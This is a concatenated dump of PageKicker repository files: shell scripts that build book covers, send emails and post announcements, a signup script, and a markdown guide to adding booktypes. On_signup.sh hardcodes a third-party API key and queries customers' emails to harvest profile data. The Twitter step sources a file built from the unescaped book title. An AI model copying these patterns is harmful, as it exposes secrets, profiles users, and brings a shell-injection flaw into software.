\"$TMPDIR\"$uuid\"/seeds/pagehits\"\nelse\n\t\techo \"not expanding seeds to pages\"\n\t\tcp \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\" \"$TMPDIR\"$uuid\"/seeds/pagehits\"\nfi\n\n# filter pagehits\n\n\ncp \"$TMPDIR\"$uuid/seeds/pagehits \"$TMPDIR\"$uuid/seeds/filtered.pagehits\n\necho \"--- filtered pagehits are ---\"\ncat \"$TMPDIR\"$uuid/seeds/filtered.pagehits\n\necho \"--- end of pagehits ---\"\n\n# fetch data I will need based on seedfile\n\necho \"summary is\" $summary #summary should be on for cover building\nwikilocale=\"en\" # hard code for testing\necho $wikilocale \"is wikilocale\"\n\n# fetch by pagehits\n\ncase $summary in\n\tsummaries_only)\n\t\techo \"fetching page summaries only\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikisummaries.md\" --lang \"$wikilocale\" --summary 1> /dev/null\n\t\twordcountsummaries=$(wc -w \"$TMPDIR$uuid/wiki/wikisummaries.md\" | cut -f1 -d' ')\n\t\techo \"wordcountsummaries is\" $wordcountsummaries\n\t\tcp \"$TMPDIR$uuid\"/wiki/wikisummaries.md \"$TMPDIR$uuid\"/wiki/wiki4cloud.md\n\t\t;;\n\tcomplete_pages_only)\n\t\techo \"fetching complete pages only\"\n\t\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikipages.md\" --lang \"$wikilocale\" 1> /dev/null\n\t\twordcountpages=$(wc -w \"$TMPDIR$uuid/wiki/wikipages.md\" | cut -f1 -d' ')\n\t\techo \"wordcountpages is\" $wordcountpages\n\t\tcp \"$TMPDIR$uuid\"/wiki/wikipages.md \"$TMPDIR$uuid\"/wiki/wiki4cloud.md\n\t\t;;\n\tboth)\n\t\techo \"fetching both summaries and complete pages\"\n\t\techo \"fetching page summaries now\"\n\t\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikisummaries.md\" --lang \"$wikilocale\" --summary 1> /dev/null\n\t\twordcountsummaries=$(wc -w \"$TMPDIR$uuid\"/wiki/wikisummaries.md | cut -f1 -d' ')\n\t\techo \"fetching complete pages now\"\n\t\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikipages.md\" --lang \"$wikilocale\" 1> /dev/null\n\t\twordcountpages=$(wc -w \"$TMPDIR$uuid\"/wiki/wikipages.md | cut -f1 -d' ')\n\t\tif [ \"$wordcountpages\" -gt \"100000\" ] ; then\n\t\t\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\n\t\t\techo \"body too big for wordcloud, using abstracts only\"\n\t\telse\n\t\t\tcat \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wikipages.md > \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\n\t\t\techo \"building wordcloud from body + summaries\"\n\t\tfi\n\t\t;;\n\t*)\n\t\techo \"unrecognized summary option\"\n\t;;\nesac\n\nwordcount=$(($wordcountsummaries + $wordcountpages))\necho \"wordcount is $wordcount\"\n\nif [ \"$wordcountsummaries\" -gt \"0\" ] ; then\n\n\techo \"summaries data has been returned, proceeding\"\n\nelif [ \"$wordcountpages\" -gt \"0\" ] ; then\n\n\techo \"pages data has been returned, proceeding\"\n\nelse\n\n\techo \"zero data returned from wiki, exiting with error message\"\n\tsendemail -t \"$customer_email\" \\\n\t\t-u \"Your submission [ $booktitle ] has not been added to the catalog\" \\\n\t\t-m \"The system was not able to find any valid seed terms in your submission. Make sure that you have provided several keyphrases and that the words are spelled correctly. 
Please let us know by replying to this message if you need assistance.\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-v \\\n\t\t-o tls=yes\n\texit 73\nfi\n\n# build cover\n\ncp $scriptpath\"assets/pk35pc.jpg\" \"$TMPDIR\"$uuid/pk35pc.jpg\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\ncp $confdir\"jobprofiles\"/signatures/$sigfile \"$TMPDIR\"$uuid/$sigfile\n\n#select wordcloud stopfile\n\n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelif [ \"$wikilang\" = \"it\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/it\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n#rotate stopfile\n\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating stopfile into place\"\n\tcp \"$stopfile\" \"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n\t\"$JAVA_BIN\" -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w \"1800\" -h \"1800\" < \"$TMPDIR$uuid\"/wiki/wiki4cloud.md > \"$TMPDIR\"$uuid/cover/wordcloudcover.png\n\n#copying old stopfile backup to overwrite rotated stopfile\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating old stopfile back in place\"\n\tcp $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n# set font & color\n\n\nif [ \"$coverfont\" = \"Random\" ] ; then\n\tcoverfont=`./bin/random-line.sh ../conf/fonts.txt`\n\techo \"random coverfont is \" $coverfont\n\nelse\n\tcoverfont=$coverfont\n\techo \"using specified cover font\" $coverfont\nfi\n\n\nif [ \"$covercolor\" = \"Random\" ]; then\n\tcovercolor=`./bin/random-line.sh ../conf/colors.txt`\n\techo \"random covercolor is \" $covercolor\nelse\n\tcovercolor=$covercolor\n\techo \"using specified covercolor \"$covercolor\n\nfi\n\n\n#create base canvases\n\nconvert -size 1800x2400 xc:$covercolor \"$TMPDIR\"$uuid/cover/canvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/topcanvas.png\nconvert -size 1800x400 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomcanvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/toplabel.png\nconvert -size 1800x200 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# underlay canvas\n\ncomposite -gravity Center \"$TMPDIR\"$uuid/cover/wordcloudcover.png \"$TMPDIR\"$uuid/cover/canvas.png \"$TMPDIR\"$uuid/cover/canvas.png\n\n# build top label\n\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity center -size 1800x400 -font \"$coverfont\" caption:\"$booktitle\" \"$TMPDIR\"$uuid/cover/topcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/toplabel.png\n\n#build bottom label\n\necho \"yourname is\" $yourname\nif [ \"$yourname\" = \"yes\" ] ; then\n\teditedby=\"$human_author\"\nelse\n\techo \"robot name on cover\"\nfi\n\necho \"editedby is\" $editedby\n\n# editedby=\"PageKicker Robot \"$editedby\nconvert -background \"$covercolor\" -fill 
\"$coverfontcolor\" -gravity south -size 1800x394 \\\n -font \"$coverfont\" caption:\"$editedby\" \\\n \"$TMPDIR\"$uuid/cover/bottomcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# resize imprint logo\n\nconvert \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" -resize x200 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\n\n\n# lay the labels on top of the target canvas\n\ncomposite -geometry +0+0 \"$TMPDIR\"$uuid/cover/toplabel.png \"$TMPDIR\"$uuid/cover/canvas.png \"$TMPDIR\"$uuid/cover/step1.png\ncomposite -geometry +0+1800 \"$TMPDIR\"$uuid/cover/bottomlabel.png \"$TMPDIR\"$uuid/cover/step1.png \"$TMPDIR\"$uuid/cover/step2.png\ncomposite -gravity south -geometry +0+0 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/step2.png \"$TMPDIR\"$uuid/cover/cover.png\nconvert \"$TMPDIR\"$uuid/cover/cover.png -border 36 -bordercolor white \"$TMPDIR\"$uuid/cover/bordercover.png\ncp \"$TMPDIR\"$uuid/cover/bordercover.png \"$TMPDIR\"$uuid/cover/$sku\"ebookcover.jpg\"\nconvert \"$TMPDIR\"$uuid/cover/bordercover.png -resize 228x302 \"$TMPDIR\"$uuid/cover/$sku\"ebookcover_thumb.jpg\"\n\n\n# move cover to import directory\n\ncp \"$TMPDIR\"$uuid/cover/$sku\"ebookcover.jpg\" $mediatargetpath$uuid/$sku\"ebookcover.jpg\"\nls -l $mediatargetpath$uuid/$sku\"ebookcover.jpg\"\necho \"* * * building Magento metadata header * * *\"\necho \"metadatatargetpath is \"$metadatatargetpath\necho \"uuid is\" $uuid\necho \"verifying uuid directory\"\nls $metadatatargetpath$uuid\nls -la \"$TMPDIR\"$uuid/tldr.txt \"$TMPDIR\"$uuid/book-description.txt\n\ncat includes/builder-metadata-header.csv > $metadatatargetpath$uuid/\"current-import.csv\"\necho \"writing Magento metadata footer\" to $metadatatargetpath$uuid/\"current-import.csv\"\n. includes/builder-metadata-footer.sh >> $metadatatargetpath$uuid/\"current-import.csv\"\n\necho \"writing Dublin Core metadata for use by pandoc\"\n#. 
includes/dc-metadata.txt\n\n# increment SKU by 1\n\t\tprevsku=$sku\n\t\tsku=$((sku+1))\n\t\techo $sku >> \"$LOCAL_DATA\"\"SKUs/sku_list\"\n\t\techo \"incremented SKU by 1 to\" $sku \" and updated SKUs/sku_list\"\n\n#\nif [ \"$import\" = \"yes\" ] ; then\n\n\techo \"adding import job to the manifest\"\n\n\techo \"$uuid\" >> $scriptpath/import_status/manifest.csv\n ls -lart $scriptpath/import_status/manifest.csv\n\t$scriptpath\"bin/receiving_dock.sh\"\n\n\nelse\n\n\techo \"not importing this job\"\n\nfi\n\n\n##verbose logging for sendemail\n# cp \"$TMPDIR\"$uuid/seeds/seedphrases \"$TMPDIR\"$uuid/seeds/\"$sku\"seeds.txt\n\nif [ \"$builder\" = \"yes\" ] ; then\n\n\techo \"seedfile was\" \"$TMPDIR\"seeds/seedphrases\n\n\t$scriptpath\"bin/builder.sh\" --seedfile \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\" --booktype \"$booktype\" --jobprofilename \"$jobprofilename\" --booktitle \"$booktitle\" --ebook_format \"epub\" --sample_tweets \"no\" --wikilang \"$wikilocale\" --coverfont \"$coverfont\" --covercolor \"$covercolor\" --passuuid \"$uuid\" --truncate_seed \"no\" --editedby \"$editedby\" --yourname \"$yourname\" --customername \"$customername\" --imprint \"$imprint\" --batch_uuid \"$batch_uuid\" --tldr \"$tldr\" --subtitle \"$subtitle\" \\\n\t --add_corpora \"$add_corpora\" --analyze_url \"$analyze_url\" --dontcleanupseeds \"yes\" --mailtoadmin \"$mailtoadmin\" --summary \"$summary\" --add_this_content \"$add_this_content\" --add_this_content_part_name \"$add_this_content_part_name\" --skyscraper \"$skyscraper\" --expand_seeds_to_pages \"$expand_seeds_to_pages\" --verbose\n\necho \"test $@\"\n\nelse\n\n\techo \"no builder\"\n\nfi\n\nsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g')\necho \"safe_product_name is\" \"$safe_product_name\"\n\n\tsendemail -t \"$customer_email\" \\\n\t\t-u \"test build of [ SKU \"$prevsku $booktitle \" ] is attached\" \\\n\t\t-m \"Hi! \\n\\nAttached you will find a free test version of the book that you asked us to add to the catalog. It was created by PageKicker robots running software release $SFB_VERSION on branch\" `git rev-parse --abbrev-ref HEAD` \"on $MACHINE_NAME in $environment. To add this book to your personal account so that you can request free updates in future, you will need to order it via the PageKicker catalog at this URI:\"\\ \"$WEB_HOST\"index.php/\"$prevsku.html. \\n\\n As an additional gesture of appreciation, here is a coupon code for 3 free books: THANKS54. It is early days for us and we very much appreciate your feedback. Please take a moment to share your thoughts via this Google Form: \"$google_form\". 
Finally, note that PageKicker is open source; we encourage you to contribute to the project, which is available at $MY_GITHUB_REPO .\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".docx\" \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".epub\" \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".mobi\"\n\nif [ \"$mailtoadmin\" = \"yes\" ] ; then\n\n\tsendemail -t \"$mailtoadmin_ids\" \\\n\t\t-u \"test build of [ \"SKU $sku \"\"$booktitle\" ] is attached\" \\\n\t\t-m \"reference copy\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".mobi\"\n\nelse\n\techo \"not mailing to $mailtoadmin_ids\"\n\nfi\n\n\nif [ \"$twitter_announcement\" = \"yes\" ] ; then\n\n echo -n \"t update \" > $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n echo -n \"New: $booktitle at \"$WEB_HOST\"index.php/$prevsku.html robots #amwriting\" >> $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n . $TMPDIR$uuid/tcommand\n\nelse\n echo \"no twitter announcement\" | tee --append $sfb_log\n\nfi\n\nif [ \"$fb_announcement\" = \"yes\" ] ; then\n\n facebook-cli post \"robot author #amwriting $booktitle at \\ $WEB_HOST\"index.php/\"$prevsku.html\"\n\nelse\n echo \"no fb notification\" | tee --append $sfb_log\nfi\n\necho 'job ' $uuid 'ending logging at' `date +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\ncat \"$sfb_log\" >> $sfb_log_archive\necho -n \"copied this job's log to the master archive and am now exiting\"\nexit 0\n" }, { "alpha_fraction": 0.6604639291763306, "alphanum_fraction": 0.6709151268005371, "avg_line_length": 22.07647132873535, "blob_id": "f6161c0a5e0c4d2a39614337fa472062f1cfab20", "content_id": "9577a38b7814dee20f3669efd6a7a1b68c51492f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3923, "license_type": "permissive", "max_line_length": 211, "num_lines": 170, "path": "/scripts/on_signup.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n\n# script that runs every time a new customer is added to the Magento database\n\n# creates personal bookshelves\n\n# stocks them using API (full contact)\n\necho \"SIGNUP***SIGNUP***SIGNUP***SIGNUP\"\n\nTEXTDOMAIN=SFB\necho $\"hello, world, I am speaking\" $LANG\n\n. ../conf/config.txt\n\necho \"version id number is\" $SFB_VERSION\n\necho \"sfb_log is\" $sfb_log\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` \n\nstarttime=$(( `date +%s` ))\n\n. includes/set-variables.sh\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\n\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--customer_name)\ncustomer_name=$2\nshift 2\n;;\n--customer_name=*)\ncustomer_name=${1#*=}\nshift\n;;\n--customer_email)\ncustomer_email=$2\nshift 2\n;;\n--customer_email=*)\ncustomer_email=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\nesac\ndone\n\n# Suppose some options are required. 
Check that we got them.\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\nelse\n\tuuid=\"$passuuid\"\n\techo \"received uuid \" $uuid\n\nfi\n\n# create directories I will need\n\nmkdir -p -m 777 $TMPDIR$uuid\nmkdir -p -m 777 $TMPDIR$uuid/categories\nmkdir -p -m 755 $metadatatargetpath$uuid\n\necho \"metadatatargetpath is \"$metadatatargetpath\necho \"uuid is\" $uuid\n\n# create category id(s)\n\ncatid=`tail -1 < \"$LOCAL_DATA\"\"categories/catid\"`\necho \"catid \" $catid\n\n# writing category import file \n\ncat includes/category_header.csv > $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n. includes/bookshelf-footer.sh >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\ncp $metadatatargetpath$uuid/\"import_bulk_categories.csv\" $TMPDIR$uuid # for testing\n\nif [ \"$import\" = \"yes\" ] ; then \n\n\techo \"adding import job to the manifest\" \n\n\techo $uuid >> import_status/manifest.csv\n\n\n\t$scriptpath\"bin/build_bookshelf.sh\"\n\n\n\t# sendemail disabled; all continuation lines are commented out so they do not execute as stray commands\n\t# sendemail -t \"$customer_email\" \\\n\t#\t-u \"Public Bookshelf for $customer_name has been added to the PageKicker catalog\" \\\n\t#\t-m \"Your public bookshelf has been added to the PageKicker catalog. The URL is:\"\\ \"$WEB_HOST\".html \"It has been prestocked with books created based on interests drawn from your public social media profile.\" \\\n\t#\t-f \"$gmail_id\" \\\n\t#\t-cc \"$gmail_id\" \\\n\t#\t-xu \"$gmail_id\" \\\n\t#\t-xp \"$GMAIL_PASSWORD\" \\\n\t#\t-s smtp.gmail.com:587 \\\n\t#\t-o tls=yes\n\n\t# increment catid by 1\n\n\tprevcatid=$catid\n\tcatid=$((catid+1)) \n\techo $catid >> \"$LOCAL_DATA\"\"categories/catid\"\n\techo \"incremented catid by 1 to\" $catid\" and updated categories/catid\" \n\n\techo 'on_signup.sh job ' $uuid 'ran on' `date +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\nelse\n\n\techo \"not importing this category\" \n\nfi\n\n# get information about customer\n\nFullContactAPIKey=\"8f1d60267f1b859f\"\nAPIendpoint=\"https://api.fullcontact.com/v2/person.xml?email=\"\nAPItxt=\"&apiKey=\"\npersonurl=$APIendpoint$customer_email$APItxt$FullContactAPIKey\necho \"personurl is\" $personurl\ncurl --silent \"$personurl\" > $TMPDIR$uuid/person.xml\n\nxmlstarlet sel -T -t -m \"/person/digitalFootprint/topics/topic/value\" -c . -n $TMPDIR$uuid\"/person.xml\" > $TMPDIR$uuid/topic-seeds\nxmlstarlet sel -T -t -m \"/person/demographics/locationDeduced/normalizedLocation\" -c . -n \"$TMPDIR$uuid\"/person.xml >> $TMPDIR$uuid/topic-seeds\nxmlstarlet sel -T -t -m \"/person/organizations/name\" -c . 
-n \"$TMPDIR$uuid/person.xml\" >> $TMPDIR$uuid/topic-seeds\n\n\n#safe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g')\n#echo \"safe_product_name is\" \"$safe_product_name\"\n#google_form=\"http://goo.gl/forms/ur1Otr1G2q\"\n\n\n\n\nexit 0\n" }, { "alpha_fraction": 0.7009132504463196, "alphanum_fraction": 0.7009132504463196, "avg_line_length": 53.625, "blob_id": "946357c1f5a3dffefc8e5e573b057144ec6d62e8", "content_id": "c371182700ef86b8415c0c3aa249a0d357dac032", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 438, "license_type": "permissive", "max_line_length": 73, "num_lines": 8, "path": "/test/analyze_url_trek", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# runs test of $analyze_url flag to add web seeds to seed file\nbin/create-catalog-entry.sh --builder \"yes\" --booktitle \"Anton Yelchin \nof Star Trek Dies\" --yourname \"yes\" --jobprofilename \"default\" --import \n\"no\" --seedfile \"/home/fred/scratch/Anton\" --imprint \"pagekicker\" --tldr \n\"Do not leave your car in neutral...\" --editedby \"Trekkie\" --subtitle \n\"An instant book\" --analyze_url \"http://www.cnn.com\" --dontcleanupseeds \n\"yes\"\n\n" }, { "alpha_fraction": 0.6107784509658813, "alphanum_fraction": 0.7065868377685547, "avg_line_length": 19.875, "blob_id": "d31d37f2ab5ed943ed51c09725e53cddc1584776", "content_id": "f021ea7ddee694595635838318ddf3e01b54299e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 167, "license_type": "permissive", "max_line_length": 43, "num_lines": 8, "path": "/scripts/stamper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "convert \\\n -colorspace RGB \\\n -size 2550x3300 xc:transparent \\\n -fill grey \\\n -pointsize 144\\\n -gravity Center\\\n -annotate +100+30 \"This is an annotation\"\\\n stamp.pdf\n" }, { "alpha_fraction": 0.6751435399055481, "alphanum_fraction": 0.6751435399055481, "avg_line_length": 52, "blob_id": "c18fcb1605b5d0552d3ff4715da70851d6e9141e", "content_id": "aaf0a4f127a5c64c2c4459c7f752632f5653c2c7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 199, "num_lines": 23, "path": "/scripts/includes/acknowledgments.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "cp $scriptpath\"assets/rebuild.md\" \"$TMPDIR$uuid/rebuild.md\"\ncp $confdir\"jobprofiles/signatures/\"$sigfile \"$TMPDIR$uuid/$sigfile\"\necho \"# Acknowledgements from \"\"$imprintname\" \"Robot \"\"$editedby\" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \"I would like to thank \"\"$imprintname\"\" for the opportunity to write this book.\" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\ncat $scriptpath/assets/robo_ack.md >> \"$TMPDIR$uuid/robo_ack.md\"\necho \"This book was created with revision \"$SFB_VERSION \"on branch\" `git rev-parse --abbrev-ref HEAD` \"of the PageKicker software running on the server $environment. 
\" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR\"$uuid/robo_ack.md\necho \" \" >> \"$TMPDIR\"$uuid/robo_ack.md\n\n# modify acknowledgments based on source -- should become case rather than if\n\n# no active mod options\n\n# complete building acknowledgments\n\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho '<i>'\"$robot_location\"'</i>' >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho '![Robot author photo]'\"($sigfile)\" >> \"$TMPDIR$uuid/robo_ack.md\"\n" }, { "alpha_fraction": 0.7646710276603699, "alphanum_fraction": 0.7706974744796753, "avg_line_length": 73.97777557373047, "blob_id": "4aeae0183e5f43bfcef51d7174e765b6f5feb4ba", "content_id": "6bef6be9a647af90a84ac5573c80b330dfd77981", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 10122, "license_type": "permissive", "max_line_length": 838, "num_lines": 135, "path": "/docs/doc/booktype_creation.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Adding a new booktype to PageKicker\n\nIn the PageKicker algorithmic publishing platform the **booktype** is an explicit definition of the rules that are used for creating electronic codexes, i.e. content that is wrapped in \"containers\" like pages wrapped in a bound book. **Booktypes** include entities such as anthologies, chapbooks, dictionaries, encyclopedias, epic poems, and novels. Another way of describing such entities is as \"chunk-ables\" that can be published on their own, sufficiently valuable that they can be thrust into the stream of commerce (without a paddle?). At the most practical level, booktypes exist and have evolved over the centuries because they _work._ Following a known format - or inventing a new one! - can make an enormous contribution to the success of author, publisher, and book, and to the happiness of readers, librarians and even critics.\n\nIn PageKicker, booktypes go beyond \"chunk-ables\" such as encyclopedia and include other, lower-level attributes that define structure, substance, and style. Structure is defined in terms of \"parts of the book\" such as acknowledgement, foreword, epigraph, part, chapter, bibliography, and index. Substance is defined by rules that govern the search, creation, and assembly strategy for each part of the book. For example, the substance rule for \"encyclopedia\" might be \"search for all content relevant to the seed phrases and assemble each document in alphabetical order\". Similarly, a rule for style might be \"use the order of parts specified by the Chicago Manual of the Style\". \n\nPageKicker's approach to booktypes is an algorithmic abstraction of an important aspect of traditional publishing. Early in the acquisition and development stage an author or publisher who is contemplating a book on a particular topic for a particular audience must consider what is the best format for the job. The default is usually the standard codex book, i.e. front matter, sequential chapters, back matter, but as noted above there are scores of options that have been developed over 500+ years of publishing. The algorithmic approach enables the publisher to define and continually improve consistent rules for creating books in a particular format. 
The publisher can also switch from one booktype to another instantly and painlessly experiment with different approaches to the same work.\n\n## Technical Details\n\nThe default booktype is _reader_, which is a codex nonfiction with parts of the book in order as specified in the Chicago Manual of Style, i.e. front matter, body, back matter. One _booktype_ has recently been added, _draft-report_. The purpose of _draft-report_ is to streamline the reader format to only those parts of the book that are helpful in jump-starting the writing of report, i.e. title, an executive summary, content, and bibliography--much reduced front matter.\n\n**Booktype** is one of several hundred variables that the PageKicker system accesses during book creation.\nThe **$booktype** variable is specified at runtime. Like most variables in PageKicker, the order of precedence is (in ascending order), the config file _~/.pagekicker,_ the default variable values file _scripts/includes/set-variables.sh_, and the command line as _--booktype._ Note that the value of **$booktype** provided at the command line can be overridden by values specified in _jobprofiles_ for robots or imprints. Thus, if an imprint file explicitly defines the booktype as always \"encyclopedia\", PageKicker will always create all books for that imprint as encylopedias. For this reason, it is recommended that booktypes should not be specified in imprint files (unless the imprint always publishes one and only one type of book).\n\nWhen the _builder_ script runs, it uses a case statement to look for the value of **$booktype** and run the corresponding script. That booktypes are defined and created by scripts is probably not ideal--it might be better to have them defined strictly as data objects--but on the plus side it does largely isolate the changes. \n\n## Example: Adding a Chapbook\n\nThe procedure for adding a new booktype is relatively straightforward.\n\nThe first step is to add a new clause to the [booktype case construct](https://github.com/fredzannarbor/pagekicker-community/blob/bf0e752097451c8a137829388bfe7da06cd4fa5c/scripts/bin/builder.sh#L1090) in the _builder_ script. The case construct for draft-report looks like this:\n\n```\ndraft-report)\n\techo \"assembling parts needed for $booktype\"\n\n . includes/draft-report.sh\n\t\"$PANDOC_BIN\" \\\n -o \"$TMPDIR$uuid/draft-report-$safe_product_name.docx\" \\\n \"$TMPDIR\"$uuid/draft-report.md\n\n\t# note that draft-report does not get SKU because it is not\n # acompleted product\n ;;\n```\nSo, to add a new case clause for, let us say, a chapbook, the format would look like this:\n\n```\nchapbook)\n echo \"assembling parts needed for $booktype\"\n . includes/chapbook.sh\n \"$PANDOC_BIN\" -o \\\n \"$TMPDIR$uuid/$sku-chapbook-$safe_product_name.epub\" \\\n \"$TMPDIR\"$uuid/chapbook.md\n ;;\n```\nFrom inspecting the above code sample, we see that the _chapbook_ script will reside in _pagekicker-community/scripts/includes_. It need not be a shell script, it could be Python or any other language. The chapbook script has one major responsibility: to return the markdown format file _chapbook.md_ to the assembly area at _$TMPDIR$uuid_, which will then use **pandoc** to convert it into an epub format document. (Additional formats could be created by adding additional pandoc commands with different output extensions). By convention, the book files are named with an SKU followed by a safe product name, which is the literal book title with special characters converted into underscores, e.g. 
_12345678-The_Plant.epub_. The ;; command concludes the case clause.\n\nSince the _chapbook_ script runs as a sourced include (part of the main script), all defined PageKicker variables are available to it. Since as mentioned above all parts of the book required for _reader_ are built by default, _chapbook_ is only responsible for creating any unique parts needed for a chapbook. \n\nWhile chapbooks have a long history and were created for a wide variety of purposes, the most common modern usage is for small collections of poetry by a single author. Thus, we will assume that the script needs to write a number of poems. Take a look at the [code for _draft-report.sh_](https://github.com/fredzannarbor/pagekicker-community/blob/master/scripts/includes/draft-report.sh), which includes three major parts: comments, part creation, and assembly.\n\nThe script begins by documenting our work.\n\n```\n#!/bin/bash\n# --booktype=\"chapbook\"\n# A specified number of poems are created.\n# There is a limit on word count.\n# Other attributes may be implemented as desired.\n# See http://www.baymoon.com/~ariadne/chapbooks.htm\n# for a helpful guide to possible attributes.\n# The script must return chapbook.md to 